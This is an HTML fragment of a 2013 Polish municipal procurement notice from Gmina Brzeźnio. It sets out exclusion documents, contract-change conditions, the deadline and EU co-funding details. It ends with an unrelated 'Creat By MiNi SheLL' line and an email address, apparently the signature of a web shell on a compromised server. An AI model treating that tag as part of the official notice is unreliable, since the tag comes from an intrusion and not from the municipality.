<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- opisów, instrukcji obsługi, kart katalogowych, certyfikatów, atestów, aprobat technicznych lub innych dokumentów potwierdzających, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego w siwz. Zamawiający uzna za wystarczające załączenie jednego z w/w dokumentów potwierdzającego, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego. Załączenie w/w dokumentów wymagane jest jedynie przy zastosowaniu materiałów i urządzeń równoważnych wymienionych w załączniku nr 10 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz ofertowy - sporządzony zgodnie z załącznikiem nr 2 do niniejszej SIWZ;
b)	oryginał pełnomocnictwa udzielanego osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego;
c)	w przypadku wspólnego ubiegania się o udzielenie zamówienia - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
d) 	pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów (osób) na okres korzystania z nich przy wykonaniu zamówienia, jeżeli w wykazie, o którym mowa w rozdziale VII ust. 1 pkt c) niniejszej siwz, wykonawca wskazał osoby zdolne do wykonania zamówienia innych podmiotów.
e)	dokument potwierdzającego wniesienie wadium
f) oświadczenie w trybie art. 22 ustawy Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej umowy może nastąpić za zgoda obu stron wyrażoną na piśmie, pod rygorem nieważności.
2.	Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, gdy nastąpi:
a)	zmiana terminu przewidzianego na rozpoczęcie robót:
- zmiany spowodowane warunkami atmosferycznymi w szczególności:
-	klęski żywiołowe;
-	warunki atmosferyczne odbiegające od typowych, uniemożliwiające rozpoczęcie i prowadzenie robót budowlanych;
- niemożliwość niezwłocznego zawarcia umowy po dokonaniu wyboru oferty najkorzystniejszej w związku z wniesionym odwołaniem;

b)	zmiana terminu przewidzianego na zakończenie robót:
- zmiany spowodowane warunkami atmosferycznymi w szczególności:
-	klęski żywiołowe;
-	warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
- zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, 
- odmienne od przyjętych w dokumentacji projektowej warunki geologiczne;
-  odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
- zmiany będące następstwem okoliczności leżących po stronie zamawiającego 
w szczególności:
-	wstrzymanie robót przez Zamawiającego;
-	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonana i odbioru robót;
-	odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, 
w tym odmowa udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji;
-	zmiany będące następstwem powierzenia przez zamawiającego wykonania zamówień dodatkowych lub robót zamiennych, jeżeli terminy ich powierzenia, rodzaj oraz zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy;
-	konieczność uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów;
-	wstrzymanie realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
Przedłużenie terminu zakończenia robót jest dopuszczone o tyle dni w czasie, których wykonywanie robót było niemożliwe z uwagi na wystąpienie którejkolwiek z w/w okoliczności, co potwierdzi inspektor nadzoru wpisem w dzienniku budowy.
c)	zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
- niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót  spowodowania zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
- pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
- pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
- konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
d)	zmiana ceny umownej (dotyczy tylko zmniejszenia ceny umownej):
W przypadku, gdy Zamawiający zrezygnuje z części prac lub zmniejszy ich zakres, wynagrodzenie Wykonawcy zostanie pomniejszone o wartość tych prac wynikającą 
z kosztorysu ofertowego, który będzie stanowił załącznik do umowy.
e)	pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
- zmiana powszechnie obowiązujących przepisów prawa w zakresie mającymi wpływ na realizację zamówienia;
- konieczność wprowadzenia zmian będzie następstwem zmian stawki VAT, przy czym zmianie ulega kwota podatku VAT i kwota brutto;
- siła wyższa  uniemożliwiająca wykonanie przedmiotu umowy zgodnie z siwz;
- zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;

f)	zamawiający przewiduje rozwiązania zamienne, które nie wykraczają poza zdefiniowany przedmiot zamówienia;

Uwzględnienie robót zamiennych w trakcie realizowanej inwestycji może nastąpić przez zmianę umowy o zamówienie publiczne (aneks do umowy). Przykładem zmiany nie powodującej wykroczenia poza przedmiot zamówienia będzie decyzja o zmianie sposobu wykonania jakiegoś elementu robót, zmiany materiałów itp.
Wprowadzenie robót zamiennych nie może spowodować zwiększenia wysokości wynagrodzenia określonego w umowie.
Roboty zamienne mogą zostać wykonane wyłącznie na podstawie uprzednio sporządzonego protokołu konieczności, podpisanego przez kierownika budowy i inspektora nadzoru oraz zatwierdzonego przez Kierownika Zamawiającego.

g)	Zamawiający przewiduje wydłużenie terminu związania ofertą na okres nie dłuższy niż 
60 dni.
h)	Zamawiający przewiduje zmiany nazw, siedziby stron umowy, numerów kont bankowych i innych danych identyfikacyjnych.
i)	Zamawiający przewiduje zmiany form zabezpieczenia należytego wykonania umowy.
j)	Zamawiający przewiduje zmiany osób odpowiedzialnych za kontakty, nadzór nad przedmiotem umowy, kierowników budowy.
k)	Zamawiający przewiduje zmniejszenie zakresu wynagrodzenia z przyczyn 
o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć
l)	Na podstawie art. 93 ust. 1a zamawiający przewiduje unieważnienie postępowania 
o udzielenie zamówienia, jeżeli środki pochodzące z Unii Europejskiej, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostaną mu przyznane.
m)	Zamawiający przewiduje możliwość zmniejszenia zakresu robót i ustalenia nowego wynagrodzenia w oparciu o kosztorys ofertowy, stanowiący załącznik do umowy. Powodem zmniejszenia zakresu prac może być m.in. brak środków zewnętrznych na finansowanie, nie wykonanie przez Wykonawcę całości przedmiotu zamówienia itp.

Dokonanie zmian, o których mowa powyżej wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeznio.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brzeźnio, ul. Wspólna 44, 98-275 Brzeźnio.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2013 godzina 10:00, miejsce: Urząd Gminy w Brzeźnio, ul. Wspólna 44, 98-275 Brzeźnio, I piętro - sekretariat, pok. nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej 
objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com